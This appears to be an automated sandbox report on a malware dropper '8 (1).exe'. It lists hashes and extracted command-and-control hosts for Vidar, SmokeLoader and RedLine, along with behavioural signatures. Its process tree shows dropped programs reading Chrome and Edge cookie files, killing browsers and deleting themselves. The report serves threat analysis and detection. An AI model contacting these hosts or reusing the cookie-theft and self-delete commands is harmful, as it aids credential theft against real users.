Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    03-08-2021 09:42

General

  • Target

    8 (1).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

2_8_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

WW

C2

193.56.146.60:51431

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 31 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 36 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 52 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1176
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2800
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2780
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Modifies registry class
          PID:2696
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2536
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2528
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1948
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1420
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1412
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1140
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1084
                      • C:\Users\Admin\AppData\Roaming\fwicres
                        C:\Users\Admin\AppData\Roaming\fwicres
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4248
                      • \??\c:\windows\system\svchost.exe
                        c:\windows\system\svchost.exe
                        2⤵
                          PID:4768
                        • C:\Users\Admin\AppData\Roaming\dticres
                          C:\Users\Admin\AppData\Roaming\dticres
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:2560
                        • C:\Users\Admin\AppData\Roaming\fwicres
                          C:\Users\Admin\AppData\Roaming\fwicres
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4244
                        • C:\Users\Admin\AppData\Roaming\riicres
                          C:\Users\Admin\AppData\Roaming\riicres
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:184
                          • C:\Users\Admin\AppData\Roaming\riicres
                            C:\Users\Admin\AppData\Roaming\riicres
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4352
                        • \??\c:\windows\system\svchost.exe
                          c:\windows\system\svchost.exe
                          2⤵
                            PID:2384
                          • C:\Users\Admin\AppData\Roaming\dticres
                            C:\Users\Admin\AppData\Roaming\dticres
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:2772
                          • C:\Users\Admin\AppData\Roaming\riicres
                            C:\Users\Admin\AppData\Roaming\riicres
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:3720
                            • C:\Users\Admin\AppData\Roaming\riicres
                              C:\Users\Admin\AppData\Roaming\riicres
                              3⤵
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:3828
                          • C:\Users\Admin\AppData\Roaming\fwicres
                            C:\Users\Admin\AppData\Roaming\fwicres
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4832
                          • \??\c:\windows\system\svchost.exe
                            c:\windows\system\svchost.exe
                            2⤵
                              PID:3168
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                            1⤵
                              PID:1008
                            • C:\Users\Admin\AppData\Local\Temp\8 (1).exe
                              "C:\Users\Admin\AppData\Local\Temp\8 (1).exe"
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3560
                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:2772
                                • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\setup_install.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\setup_install.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of WriteProcessMemory
                                  PID:708
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_1.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4040
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_1.exe
                                      sonia_1.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:2336
                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_1.exe
                                        "C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_1.exe" -a
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2992
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1112
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_2.exe
                                      sonia_2.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious behavior: MapViewOfSection
                                      PID:3864
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1108
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_3.exe
                                      sonia_3.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      PID:1688
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 904
                                        6⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4844
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2160
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_4.exe
                                      sonia_4.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2376
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_6.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3940
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_6.exe
                                      sonia_6.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of WriteProcessMemory
                                      PID:648
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        6⤵
                                          PID:2808
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4912
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          6⤵
                                            PID:4360
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                              PID:4736
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_7.exe
                                          4⤵
                                            PID:3972
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c sonia_5.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:784
                                            • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_5.exe
                                              sonia_5.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Checks computer location settings
                                              PID:1816
                                              • C:\Users\Admin\Documents\Vt1PIroMdSlkgQcPzPBBbSte.exe
                                                "C:\Users\Admin\Documents\Vt1PIroMdSlkgQcPzPBBbSte.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2096
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  7⤵
                                                    PID:4144
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      8⤵
                                                      • Kills process with taskkill
                                                      PID:684
                                                • C:\Users\Admin\Documents\qgZVcOY3go4i6Wm4t8lJ6Jw1.exe
                                                  "C:\Users\Admin\Documents\qgZVcOY3go4i6Wm4t8lJ6Jw1.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:2104
                                                  • C:\Users\Admin\Documents\qgZVcOY3go4i6Wm4t8lJ6Jw1.exe
                                                    "C:\Users\Admin\Documents\qgZVcOY3go4i6Wm4t8lJ6Jw1.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:2224
                                                • C:\Users\Admin\Documents\wWLDVaCcuvklZisYfFvrf2J6.exe
                                                  "C:\Users\Admin\Documents\wWLDVaCcuvklZisYfFvrf2J6.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:2180
                                                • C:\Users\Admin\Documents\qnu6RoOHN94_bxm4NBRTQayP.exe
                                                  "C:\Users\Admin\Documents\qnu6RoOHN94_bxm4NBRTQayP.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:2560
                                                  • C:\Users\Admin\Documents\qnu6RoOHN94_bxm4NBRTQayP.exe
                                                    "{path}"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:3456
                                                • C:\Users\Admin\Documents\doDJskA1SEOVefat7LXrty_4.exe
                                                  "C:\Users\Admin\Documents\doDJskA1SEOVefat7LXrty_4.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4132
                                                  • C:\Users\Admin\Documents\doDJskA1SEOVefat7LXrty_4.exe
                                                    C:\Users\Admin\Documents\doDJskA1SEOVefat7LXrty_4.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4604
                                                • C:\Users\Admin\Documents\Zb2IzTtNUEdN9V5BjTKM2jDL.exe
                                                  "C:\Users\Admin\Documents\Zb2IzTtNUEdN9V5BjTKM2jDL.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:2052
                                                • C:\Users\Admin\Documents\tbMIuu791B_hR1ALFmQvVpHn.exe
                                                  "C:\Users\Admin\Documents\tbMIuu791B_hR1ALFmQvVpHn.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Modifies registry class
                                                  PID:3996
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4796
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4636
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:2808
                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:2792
                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                        PID:3564
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:5096
                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:4976
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:2992
                                                          • C:\Users\Admin\Documents\LSipwjNvv1vmWJlhrYXlSmyp.exe
                                                            "C:\Users\Admin\Documents\LSipwjNvv1vmWJlhrYXlSmyp.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:4136
                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Drops startup file
                                                              PID:4208
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                8⤵
                                                                  PID:2792
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                  8⤵
                                                                    PID:4576
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:4992
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:3280
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:4964
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:2152
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:4548
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                    8⤵
                                                                      PID:2884
                                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4428
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:5092
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:1960
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      8⤵
                                                                        PID:4444
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                          PID:4012
                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Checks whether UAC is enabled
                                                                        • Drops file in Program Files directory
                                                                        PID:4456
                                                                    • C:\Users\Admin\Documents\AIQ61JjivcsG7wd5lJOWMAbC.exe
                                                                      "C:\Users\Admin\Documents\AIQ61JjivcsG7wd5lJOWMAbC.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:2232
                                                                    • C:\Users\Admin\Documents\QuefCW3aeQ8kA1PPhZ2R64EJ.exe
                                                                      "C:\Users\Admin\Documents\QuefCW3aeQ8kA1PPhZ2R64EJ.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:2220
                                                                      • C:\Users\Admin\Documents\QuefCW3aeQ8kA1PPhZ2R64EJ.exe
                                                                        "C:\Users\Admin\Documents\QuefCW3aeQ8kA1PPhZ2R64EJ.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:2808
                                                                    • C:\Users\Admin\Documents\lZgseG8QlQsYapsk14aIAHoJ.exe
                                                                      "C:\Users\Admin\Documents\lZgseG8QlQsYapsk14aIAHoJ.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:4736
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 660
                                                                        7⤵
                                                                        • Program crash
                                                                        PID:4928
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 672
                                                                        7⤵
                                                                        • Program crash
                                                                        PID:4508
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 636
                                                                        7⤵
                                                                        • Program crash
                                                                        PID:4016
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 700
                                                                        7⤵
                                                                        • Program crash
                                                                        PID:3156
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 696
                                                                        7⤵
                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                        • Program crash
                                                                        PID:3600
                                                                    • C:\Users\Admin\Documents\AwZ3WTKp2BI4LSqk4ixDS3n6.exe
                                                                      "C:\Users\Admin\Documents\AwZ3WTKp2BI4LSqk4ixDS3n6.exe"
                                                                      6⤵
                                                                        PID:4580
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im AwZ3WTKp2BI4LSqk4ixDS3n6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\AwZ3WTKp2BI4LSqk4ixDS3n6.exe" & del C:\ProgramData\*.dll & exit
                                                                          7⤵
                                                                            PID:4484
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im AwZ3WTKp2BI4LSqk4ixDS3n6.exe /f
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:4144
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              8⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:4828
                                                                        • C:\Users\Admin\Documents\ZoouV5XRzjbMesiE1KsybRRj.exe
                                                                          "C:\Users\Admin\Documents\ZoouV5XRzjbMesiE1KsybRRj.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4592
                                                                          • C:\Users\Admin\Documents\ZoouV5XRzjbMesiE1KsybRRj.exe
                                                                            "C:\Users\Admin\Documents\ZoouV5XRzjbMesiE1KsybRRj.exe" -a
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:872
                                                                        • C:\Users\Admin\Documents\T5DYqOnKwApX2Zuuxs9HLxVx.exe
                                                                          "C:\Users\Admin\Documents\T5DYqOnKwApX2Zuuxs9HLxVx.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4676
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 660
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:3592
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 672
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:508
